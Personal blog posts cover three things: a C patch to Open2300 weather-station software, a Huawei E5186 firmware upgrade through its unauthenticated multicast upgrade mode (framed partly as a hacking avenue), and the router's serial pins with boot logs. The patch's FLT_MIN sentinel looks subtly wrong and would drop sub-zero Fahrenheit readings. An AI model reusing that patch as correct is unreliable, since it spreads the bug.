Good thing that Weather Underground allows you to edit by removing data points. So, there are couple gaps in my graphs now:
The reson for this weird behaviour can be found from the spec:
OMG! The lower bound of outside temperature measurement is -29.9 °C. In Finland that can be reached occasionally.
Fortunately I'm using open source software, Open2300. With very little debugging I found the code:
double temperature_outdoor(WEATHERSTATION ws2300, int temperature_conv)
...
return ((((data[1] >> 4) * 10 + (data[1] & 0xF) +
(data[0] >> 4) / 10.0 + (data[0] & 0xF) / 100.0) - 30.0));
double dewpoint(WEATHERSTATION ws2300, int temperature_conv)
...
return ((((data[1] >> 4) * 10 + (data[1] & 0xF) +
(data[0] >> 4) / 10.0 + (data[0] & 0xF) / 100.0) - 30.0));
There is a formula to convert raw data read from RS-232 -line to celsius.
My patch to fix this is:
--- svn/rw2300.h 2015-01-19 23:42:17.728311172 +0200
+++ JaTu/rw2300.h 2016-02-04 23:58:45.675123710 +0200
@@ -24,6 +24,7 @@
#include <math.h>
#include <sys/types.h>
#include <sys/stat.h>
+#include <float.h>
#define MAXRETRIES 50
#define MAXWINDRETRIES 20
@@ -56,6 +57,8 @@
#define MAX_APRS_HOSTS 6
+#define TEMPERATURE_OVERFLOW FLT_MIN
+
typedef struct {
char name[50];
int port;
--- svn/wu2300.c 2015-01-19 23:42:16.619287028 +0200
+++ JaTu/wu2300.c 2016-01-18 10:13:21.252092414 +0200
@@ -53,15 +53,18 @@
/* READ TEMPERATURE OUTDOOR - deg F for Weather Underground */
-
- sprintf(tempstring, "&tempf=%.2f", temperature_outdoor(ws2300, FAHRENHEIT) );
- strcat(urlline, tempstring);
-
+ tempfloat = temperature_outdoor(ws2300, FAHRENHEIT);
+ if (tempfloat > TEMPERATURE_OVERFLOW) {
+ sprintf(tempstring, "&tempf=%.2f", tempfloat );
+ strcat(urlline, tempstring);
+ }
/* READ DEWPOINT - deg F for Weather Underground*/
-
- sprintf(tempstring, "&dewptf=%.2f", dewpoint(ws2300, FAHRENHEIT) );
- strcat(urlline, tempstring);
+ tempfloat = dewpoint(ws2300, FAHRENHEIT);
+ if (tempfloat > TEMPERATURE_OVERFLOW) {
+ sprintf(tempstring, "&dewptf=%.2f", tempfloat );
+ strcat(urlline, tempstring);
+ }
/* READ RELATIVE HUMIDITY OUTDOOR */
--- svn/fetch2300.c 2015-01-19 23:42:17.728311172 +0200
+++ JaTu/fetch2300.c 2016-01-18 10:09:46.762108076 +0200
@@ -35,7 +35,7 @@
char tendency[15];
char forecast[15];
struct config_type config;
- double tempfloat_min, tempfloat_max;
+ double tempfloat, tempfloat_min, tempfloat_max;
int tempint, tempint_min, tempint_max;
struct timestamp time_min, time_max;
time_t basictime;
@@ -63,7 +63,11 @@
/* READ TEMPERATURE OUTDOOR */
- sprintf(tempstring, "To %.1f\n", temperature_outdoor(ws2300, config.temperature_conv) );
+ tempfloat = temperature_outdoor(ws2300, config.temperature_conv);
+ if (tempfloat == TEMPERATURE_OVERFLOW)
+ sprintf(tempstring, "To OVR\n");
+ else
+ sprintf(tempstring, "To %.1f\n", tempfloat);
strcat(logline, tempstring);
temperature_outdoor_minmax(ws2300, config.temperature_conv, &tempfloat_min,
@@ -79,8 +83,11 @@
/* READ DEWPOINT */
-
- sprintf(tempstring, "DP %.1f\n", dewpoint(ws2300, config.temperature_conv) );
+ tempfloat = dewpoint(ws2300, config.temperature_conv);
+ if (tempfloat == TEMPERATURE_OVERFLOW)
+ sprintf(tempstring, "DP OVR\n");
+ else
+ sprintf(tempstring, "DP %.1f\n", tempfloat );
strcat(logline, tempstring);
dewpoint_minmax(ws2300, config.temperature_conv, &tempfloat_min,
There I introduce a hard-limit of TEMPERATURE_OVERFLOW and check if that has been reached. If yes, the invalid value is not sent to WUnderground.
I've contacted the author of Open2300 about this, but haven't received a response.
Huawei E5186 Firmware Upgrade with Multicast Upgrade Tool
Monday, January 25. 2016
Typical firmware upgrade for any entwork applicance is done via web-interface. The obvious catch in that is, that you need to authenticate, move to a suitable page and upload a file to accomplish that. In rare cases, hardware has an "upgrade mode", which allows you to inject a new firmare to the device without any proper authentication. For hacking, this opens a completely new avenue. If one could modify a firmware (and sign it), it would be possible to unlock locked devices, unlock features, or introduce new functionality.
Getting the box to the upgrade mode sounds easy:
turn power off from the device, keep WPS and Wi-Fi buttons pressed, kick on the power and at a suitable time release the Wi-Fi button. Then normal boot process is stopped and the box will wait for a firmware file to be delivered to it. In reality, it's bit tricky. Possible to do, but bit tricky.
Prerequisites
To get the upgrade rolling you'll need following things:
- Huawei E5186s-22a router
- A computer running Windows 7, 8 or 10
- Administrator permissions for changing TCP/IP settings is required
- An ethernet cable to connect the computer to the router's LAN-port
- A firmware file to upload, filename will be something like
BV7R2C0update_<version number>.gz.bin - Multicast Upgrade Tool
- This is not publicly available file
- Tool's filename is
multicast_upgrade_tool.exe, 3354624 bytes - The one I got was packaged into
multicast.rar, 1040927 bytes. - SHA-256 sum of
multicast_upgrade_tool.exeis6224fe8fb0ec628a29ade1d7d5fb2db5183bfd43486037d0cdf8c363e8ed8eca
- WinRar packing utility from http://www.win-rar.com/ installed and working on your Windows
Setup
This is what my setup looks like:
I didn't have any switches or any other network appliance there, I just hooked the other end of the cable to my laptop and one end to the router. (The Kabuto car in the bottom corner is optional )
Next thing you'll need to confirm is your firewall software (or Windows built in one). Depending on what you have it may not allow the outgoing traffic.
The definition of upgrade traffic profile is as follows:
It is UDP, both initiator and responder are at port 13456. The obvious thing that you need to notice is, that traffic is multicast.
My firewall rule is:
Make sure you'll allow outgoing traffic to multicast address 224.0.0.119. For any layman, that looks like just another IP-address, but it isn't one. It is in multicast address range and will be handled differently by TCP/IP-stack.
As all you TCP/IP savvy people know, multicast works no matter what your computer's IP-address is. That being said, I still recommend you change the computer's IP-address to network 192.168.8/24 which is used by the E5186. It is done from control panel (the screen shots are from Windows 10):
I didn't bother setting up any DNS-servers there. It will work without. The value of 192.168.8.100 is recommended by Huawei manual, so I used that.
Final setup thing is to make sure your Multicast Upgrade Tool can access WinRAR. On startup this will happen:
Just point the file selector to your already installed WinRAR:
That's it. That will do for the setup.
Update
Now this is the time to start practicing the upgrade mode -switch on power up.
First the normal, non-interrupt bootup sequence. It will look like this on your LEDs:
Serial console logs indicate, that you'll have 0,850 seconds from power-on to words "not in router upgrade mode" to be logged. So, I strongly suggest, that you'll keeps WPS and Wi-Fi buttons when you flip the power switch.
Your window-of-opportunity to release the Wi-Fi -button is between 0,850 and 1,890 seconds from power-on. If you release earlier, it's same as not pressing them at all. If you'll press them longer, you'll get the phrase "not in router upgrade mode" to the log, meaning that you failed.
This is what a success will look like:
If your blue LED keeps lit, like this:
Then everything is still ok. I cannot reproduce that every time, but I successfully updated firmwares with that status also. The idea is, that the blue LED keeps lit.
In that state the router is expecting you to start sending the file:
When you're successfully sending, the LEDs will indicate it:
The Wi-Fi LED will blink. It will go off once a while, but don't worry about it.
You can monitor the number of times, the file has been sent:
The entire upgrade can take like 10 minutes and you'll be transferring the file any number of times. Once I had to transfer it 11 times, before E5186 got all the bits of it.
Don't lose hope here!
Completing update
When your upgrade is completed and you're ready to power off the router, LEDs will look like this:
The Wi-Fi LED will go on and off slowly. It will keep doing that forever or until you power of the unit, whichever comes first.
Now you're done!
Go ahead kick the power back on and see how it went.
Huawei E5186 RS-232 pins explained
Saturday, January 23. 2016
For the 2nd time, I got an E5186 loaner (post about the 1st time here). This time with permission to take a closer look inside.
Since this one had already RS-232 wires soldered, I took them for closer inspection. Un-boxing is exactly like in B593, 3 PH-2 screws holding the cover in place. Two at the bottom of the unit (one covered with a warranty paper) and one screw at the back between LTE-antennas.
Layout
After popping the cork, the board's flipside looks like this:
In this unit, there is no need to pry open none of the 4 shiny ESD covers. All the good stuff is on the other side. Again, 4 PH-2 screws holding the board in place.
Board, right side up:
In this case, the obvious clue for me was the already soldered RS-232 wires. I'm also publishing another picture by KOSH, a LTEforum.at activist, describing some of the good parts an E5186 board has:
There are 2 of: LTE/UMTS antennas on top corners, 5 GHz WLAN antennas at the sides and 2,4 GHz WLAN antennas on the bottom corners. The picture doesn't point out the locations of RS-232 pins, only the ground and Vcc pins.
Linux
A closer look of the Linux side pins right next to the SIM-slot:
No surprises there, the signal levels of RS-232 were 1,8 volts. It means, that an expensive USB-RS232 adapter is rquired for access. Your run-of-the-mill cheap 3,3 volt adapters are completely useless for this.
The descripions of RX/TX are from the point of the router (DCE), not from your computer (that would be DTE). It means, that any output signal (TX or transmit) described in the picture should be connected to input of the computer (RX or receive).
A bootup output of that port would be:
Digital core power voltage set to 0.9375V
Decompressing...done
CFE version 6.37.14.34 (r415984) based on BBP 1.0.37 for BCM947XX (32bit,SP,)
Build Date: Sat Jun 13 09:28:20 CST 2015 (l00285057@MBB-V7R1-CPE)
Copyright (C) 2000-2008 Broadcom Corporation.
Init Arena,cfe repair version
Config GPIOs.
Init Devs.
Boot partition size = 262144(0x40000)
flash_init: bootsz = [0x80000]
add new online part !!!!!!!!
flash_init:flash_size:[0x8000000][0x2000000|33554432]
DDR Clock: 400 MHz
Info: DDR frequency set from clkfreq=800,*400*
et0: Broadcom BCM47XX 10/100/1000 Mbps Ethernet Controller 6.37.14.34 (r415984)
CPU type 0x0: 800MHz
Tot mem: 131072 KBytes
CFE mem: 0x00F00000 - 0x010AC8E4 (1755364)
Data: 0x00F646F0 - 0x00F65184 (2708)
BSS: 0x00F65190 - 0x00FAA8E4 (284500)
Heap: 0x00FAA8E4 - 0x010AA8E4 (1048576)
Stack: 0x010AA8E4 - 0x010AC8E4 (8192)
Text: 0x00F00000 - 0x00F55E40 (351808)
Device eth0: hwaddr 00-90-4C-0F-0F-00, ipaddr 192.168.1.1, mask 255.255.255.0
gateway not set, nameserver not set
not in router upgrade mode
Loader:raw Filesys:raw Dev:nflash0.os File: Options:(null)
Loading: ..... 5853216 bytes read
Entry at 0x00008000
Closing network.
Starting program at 0x00008000
[ 2.950000] console [ttyS0] enabled, bootconsole disabled
[ 2.950000] serial8250.0: ttyS1 at MMIO 0x18000400 (irq = 117) is a 16550
[ 2.960000] brd: module loaded
[ 2.970000] loop: module loaded
[ 2.970000] [CHIP_COMM] LINE:849: [client] socket send fail!
[ 2.980000] DRV_RHPC: Detect Modem fail with 0x1, run startup status detection thread!!
[ 2.990000] Platform Driver Remote Host Procedure Call init.
[ 2.990000] Enter ecall init
[ 3.000000] Finish ecall init
[ 3.000000] tsk:kthread_run is success!
[ 3.000000] SCSI Media Changer driver v0.25
[ 3.010000] pflash: found no supported devices
[ 3.020000] bcmsflash: found no supported devices
[ 3.070000] Boot partition size = 524288(0x80000)
[ 3.080000] lookup_nflash_rootfs_offset: offset = 0x200000
[ 3.080000] nflash: squash filesystem with lzma found at block 35
[ 3.090000] Creating 4 MTD partitions on "nflash":
[ 3.090000] 0x000000000000-0x000000080000 : "boot"
[ 3.100000] 0x000000080000-0x000000200000 : "nvram"
[ 3.110000] 0x000000200000-0x000002a00000 : "linux"
[ 3.110000] 0x0000004600f8-0x000002a00000 : "rootfs"
[ 3.120000] PPP generic driver version 2.4.2
[ 3.120000] PPP Deflate Compression module registered
[ 3.130000] PPP BSD Compression module registered
[ 3.130000] PPP MPPE Compression module registered
[ 3.140000] NET: Registered protocol family 24
[ 3.140000] SLIP: version 0.8.4-NET3.019-NEWTTY (dynamic channels, max=256).
[ 3.150000] usbmon: debugfs is not available
[ 3.150000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 3.160000] ehci_hcd 0000:00:0b.1: EHCI Host Controller
[ 3.170000] ehci_hcd 0000:00:0b.1: new USB bus registered, assigned bus number 1
[ 3.210000] ehci_hcd 0000:00:0b.1: irq 111, io mem 0x18021000
[ 3.230000] ehci_hcd 0000:00:0b.1: USB 0.0 started, EHCI 1.00
[ 3.230000] hub 1-0:1.0: USB hub found
[ 3.240000] hub 1-0:1.0: 2 ports detected
[ 3.240000] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 3.250000] ohci_hcd 0000:00:0b.0: OHCI Host Controller
[ 3.250000] ohci_hcd 0000:00:0b.0: new USB bus registered, assigned bus number 2
[ 3.260000] ohci_hcd 0000:00:0b.0: irq 111, io mem 0x18022000
[ 3.320000] hub 2-0:1.0: USB hub found
[ 3.320000] hub 2-0:1.0: 2 ports detected
[ 3.330000] xhci_hcd 0000:00:0c.0: xHCI Host Controller
[ 3.330000] xhci_hcd 0000:00:0c.0: new USB bus registered, assigned bus number 3
[ 3.340000] xhci_hcd 0000:00:0c.0: irq 112, io mem 0x18023000
[ 3.350000] xhci_hcd 0000:00:0c.0: Failed to enable MSI-X
[ 3.350000] xhci_hcd 0000:00:0c.0: failed to allocate MSI entry
[ 3.360000] usb usb3: No SuperSpeed endpoint companion for config 1 interface 0 altsetting 0 ep 129: using minimum values
[ 3.370000] xHCI xhci_add_endpoint called for root hub
[ 3.380000] xHCI xhci_check_bandwidth called for root hub
[ 3.380000] hub 3-0:1.0: USB hub found
[ 3.390000] hub 3-0:1.0: 1 port detected
[ 3.390000] usbcore: registered new interface driver cdc_acm
[ 3.400000] cdc_acm: v0.26:USB Abstract Control Model driver for USB modems and ISDN adapters
[ 3.410000] usbcore: registered new interface driver usblp
[ 3.410000] Initializing USB Mass Storage driver...
[ 3.420000] usbcore: registered new interface driver usb-storage
[ 3.420000] USB Mass Storage support registered.
[ 3.430000] usbcore: registered new interface driver usbserial
[ 3.430000] USB Serial support registered for generic
[ 3.440000] usbcore: registered new interface driver usbserial_generic
[ 3.450000] usbserial: USB Serial Driver core
[ 3.450000] USB Serial support registered for GSM modem (1-port)
[ 3.460000] usbcore: registered new interface driver option
[ 3.460000] option: v0.7.2:USB Driver for GSM modems
[ 3.470000] USB Serial support registered for pl2303
[ 3.470000] usbcore: registered new interface driver pl2303
[ 3.480000] pl2303: Prolific PL2303 USB to serial adaptor driver
[ 3.480000] u32 classifier
[ 3.490000] Performance counters on
[ 3.490000] Actions configured
[ 3.490000] Netfilter messages via NETLINK v0.30.
[ 3.500000] nf_conntrack version 0.5.0 (1935 buckets, 7740 max)
[ 3.510000] ctnetlink v0.93: registering with nfnetlink.
[ 3.510000] nf_conntrack_rtsp v0.6.21 loading
[ 3.520000] xt_time: kernel timezone is -0000
[ 3.520000] IPVS: Registered protocols ()
[ 3.520000] IPVS: Connection hash table configured (size=4096, memory=32Kbytes)
[ 3.530000] IPVS: ipvs loaded.
[ 3.530000] IPv4 over IPv4 tunneling driver
[ 3.540000] nf_nat_rtsp v0.6.21 loading
[ 3.540000] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 3.550000] arp_tables: (C) 2002 David S. Miller
[ 3.550000] TCP cubic registered
[ 3.560000] NET: Registered protocol family 10
[ 3.560000] lo: Disabled Privacy Extensions
[ 3.570000] tunl0: Disabled Privacy Extensions
[ 3.570000] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 3.580000] IPv6 over IPv4 tunneling driver
[ 3.580000] sit0: Disabled Privacy Extensions
[ 3.590000] ip6tnl0: Disabled Privacy Extensions
[ 3.590000] NET: Registered protocol family 17
[ 3.600000] Bridge firewalling registered
[ 3.600000] Ebtables v2.0 registered
[ 3.600000] L2TP core driver, V2.0
[ 3.610000] PPPoL2TP kernel driver, V2.0
[ 3.610000] 802.1Q VLAN Support v1.8 Ben Greear
[ 3.620000] All bugs added by David S. Miller
[ 3.640000] Northstar brcmnand NAND Flash Controller driver, Version 0.1 (c) Broadcom Inc. 2012
[ 3.650000] NAND device: Manufacturer ID: 0x2c, Chip ID: 0xf1 (Micron NAND 128MiB 3,3V 8-bit)
[ 3.660000] Spare area=64 eccbytes 56, ecc bytes located at:
[ 3.660000] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 18 19 20 21 22 23 24 25 26 27 28 29 30 31 34 35 36 37 38 39 40 41 42 43 44 45 46 47 50 51 52 53 54 55 56 57 58 59 60 61 62 63
[ 3.680000] Available 7 bytes at (off,len):
[ 3.680000] (1,1) (16,2) (32,2) (48,2) (0,0) (0,0) (0,0) (0,0)
[ 3.690000] Scanning device for bad blocks
[ 3.780000] Options: NO_AUTOINCR,NO_READRDY,BBT_SCAN2NDPAGE,
[ 3.790000] Creating 5 MTD partitions on "brcmnand":
[ 3.790000] 0x000002a00000-0x000003e00000 : "userdata"
[ 3.800000] 0x000003e00000-0x000005200000 : "app"
[ 3.800000] 0x000005200000-0x000005c00000 : "webui"
[ 3.810000] 0x000005c00000-0x000006000000 : "online"
[ 3.810000] 0x000006000000-0x000008000000 : "upg"
[ 3.830000] VFS: Mounted root (squashfs filesystem) readonly on device 31:3.
[ 3.840000] devtmpfs: mounted
[ 3.840000] Freeing init memory: 236K
/sbin/hotplug2: No such file or directory
insmod: ipv6.ko: no module by that name found
insmod: cannot insert '/lib/modules/2.6.36.4brcmarm+/kernel/drivers/net/igs/igs.ko': Operation not permitted (-1): Operation not permitted
hotplug detected product: 12d1/1443/1
hotplug detected product: 12d1/1443/1
insmod: bcm57xx.ko: no module by that name found
boardflags:100
That looks a lot like a B593-s22 booting. A 2.6.36 Linux there running on a 32-bit BCM947XX chip.
LTE
The other RS-232 port has following pins:
It outputs something like this on a boot:
onchip
NF boot!
UnSec_boo Wä123
sec disable
456
[0000005ms]
[0000005ms]
[0000005ms]*********************************************************
[0000006ms]FASTBOOT simple console, enter 'help' for commands help.
[0000006ms]*********************************************************
[0000006ms]balong_version_get_hw_version doesn't judge udp!
[0000007ms]balong_version_get_hw_version: HARDID = 0X00040000
[0000007ms]Hisilicon NANDC_V6.00 initialize...
[0000007ms]NAND device: Manufacturer ID: 0x000000ad, Chip ID: 0x000000ac (Hynix NAND 512MiB 1,8V 8-bit)
[0000008ms]Partition Table list(HEX):ptable 1.00HI6930_V7R2_MCPEm3boot
[0000008ms]NO. |offset |loadsize |capacity |loadaddr |entry |property |count |id |name |
[0000009ms]------------------------------------------------
[000000Ams]00000001: 00000000 ,00000000 ,00040000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000101 ,m3boot
[000000Ams]00000002: 00040000 ,00000000 ,001c0000 ,4fe00000 ,4fe00000 ,00004000 ,00000000 ,00000102 ,fastboot
[000000Bms]00000003: 00200000 ,00000000 ,00200000 ,00000000 ,00000000 ,00004800 ,00000000 ,00000103 ,nvbacklte
[000000Cms]00000004: 00400000 ,00000000 ,00400000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000104 ,nvimg
[000000Cms]00000005: 00800000 ,00000000 ,00400000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000105 ,nvdload
[000000Dms]00000006: 00c00000 ,00000000 ,00200000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000106 ,nvdefault
[000000Ems]00000007: 00e00000 ,00000000 ,00400000 ,00000000 ,00000000 ,00004000 ,00000000 ,0000010d ,oeminfo
[000000Ems]00000008: 01200000 ,00000000 ,0be00000 ,00000000 ,00000000 ,00004001 ,00000000 ,00000116 ,online
[000000Fms]00000009: 0d000000 ,00000000 ,00800000 ,4ffc0000 ,4ffc0000 ,00004000 ,00000000 ,00000107 ,kernel
[0000010ms]0000000a: 0d800000 ,00000000 ,00800000 ,4ffc0000 ,4ffc0000 ,00004000 ,00000000 ,00000108 ,kernelbk
[0000010ms]0000000b: 0e000000 ,00000000 ,00200000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000109 ,m3image
[0000011ms]0000000c: 0e200000 ,00000000 ,00600000 ,00000000 ,00000000 ,00004000 ,00000000 ,0000010b ,dsp
[0000011ms]0000000d: 0e800000 ,00000000 ,00200000 ,00000000 ,00000000 ,00004000 ,00000000 ,0000011b ,misc
[0000012ms]0000000e: 0ea00000 ,00000000 ,02800000 ,50d10000 ,50d10000 ,00004000 ,00000000 ,0000010a ,vxworks
[0000013ms]0000000f: 11200000 ,00000000 ,00100000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000112 ,wbdata
[0000013ms]00000010: 11300000 ,00000000 ,00100000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000113 ,reserve2
[0000014ms]00000011: 11400000 ,00000000 ,00300000 ,00000000 ,00000000 ,00004001 ,00000000 ,00000114 ,reserve3
[0000015ms]00000012: 11700000 ,00000000 ,00c00000 ,00000000 ,00000000 ,00004001 ,00000000 ,0000010f ,om
[0000015ms]00000013: 12300000 ,00000000 ,0ad00000 ,00000000 ,00000000 ,00004001 ,00000000 ,0000010e ,system
[0000016ms]00000014: 1d000000 ,00000000 ,02d00000 ,00000000 ,00000000 ,00004001 ,00000000 ,00000117 ,cdromiso
[0000017ms]00000015: 1fd00000 ,00000000 ,00280000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000118 ,cache
[0000017ms]00000016: 1ff80000 ,00000000 ,00040000 ,00000000 ,00000000 ,00004000 ,00000000 ,00000119 ,recovery-a
[0000018ms]00000017: 1ffc0000 ,00000000 ,00040000 ,00000000 ,00000000 ,00004000 ,00000000 ,0000011a ,recovery-b
[0000019ms]^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[0000019ms]fastboot: nv dload cap is 0x00400000.
[000001Ams]fastboot: dload nv invlv_blk_num:7, total_blk_num:32!
[000001Ams]fastboot: dload nv skip total bad blk:0!
[000001Bms]warning: end page size not aligned :addr_logic:0x008e5000,blockleft:0x00000104
[0000025ms]nv boot init ok!
[0000026ms][tsensor]: tsensor init ok!
[0000026ms]board_init ok
[0000028ms]USB FastBoot: V0.9
[0000028ms]Machine ID: 3339 v0
[0000028ms]Build Date: Jun 13 2015, 09:54:53
[0000028ms]
[0000028ms]Serial Number: UNKNOWN
[0000028ms]
[0000028ms]Heap:0x5fd3c220 -- 0x5fd3c860, 1600
[0000029ms][pmu]: volt_id 35's voltage can not be set!
[0000029ms]
[0000029ms][pmu]: volt_id 39's voltage can not be set!
[000002Ams]
[000002Ams]Please distribute uart with command L/V/M...
[000002Ams] heap:0x5fd3c220 -- 0x5fd3c860, 1600
[000002Ams]OCR_AUTO_ENUM_FLAG_ADDR = 4fe1fff8 flag =eab35f51 !
[000002Bms]
[000002Bms] [ ON OFF ] Start up by Cold Reset!,reboot_cmd=0x90a7b368.
[000002Bms]balong_version_get_hw_version doesn't judge udp!
[000002Cms]balong_version_get_hw_version: HARDID = 0X00040000
[000002Cms]balong_version_get_hw_version doesn't judge udp!
[000002Cms]balong_version_get_hw_version: HARDID = 0X00040000
[000002Dms][fastboot]: boot_mode 1
[000002Dms]boot m3image from flash
[000002Dms]ptn:5fd36bbc , ptn->start = 0e000000 ptn->length = 00200000
[000002Dms]ptn:5fd36bbc , ptn->loadaddr = 00000000 ptn->entry = 00000000
[000002Ems]warning: end page size not aligned :addr_logic:0x0e00b000,blockleft:0x000003a8
[000002Fms]boot linux from flash
I don't think this side boots properly, so the output has only HiSilicon NAND-flash and Hynix DRAM mentioned.
Finally
I didn't manage to get any kind of console or prompt. There are couple of points where the Linux-side says "Press Enter to continue...", but event that didn't work. To me, it looks like the unit is not taking any input.
If you have any further information, please drop a comment below.
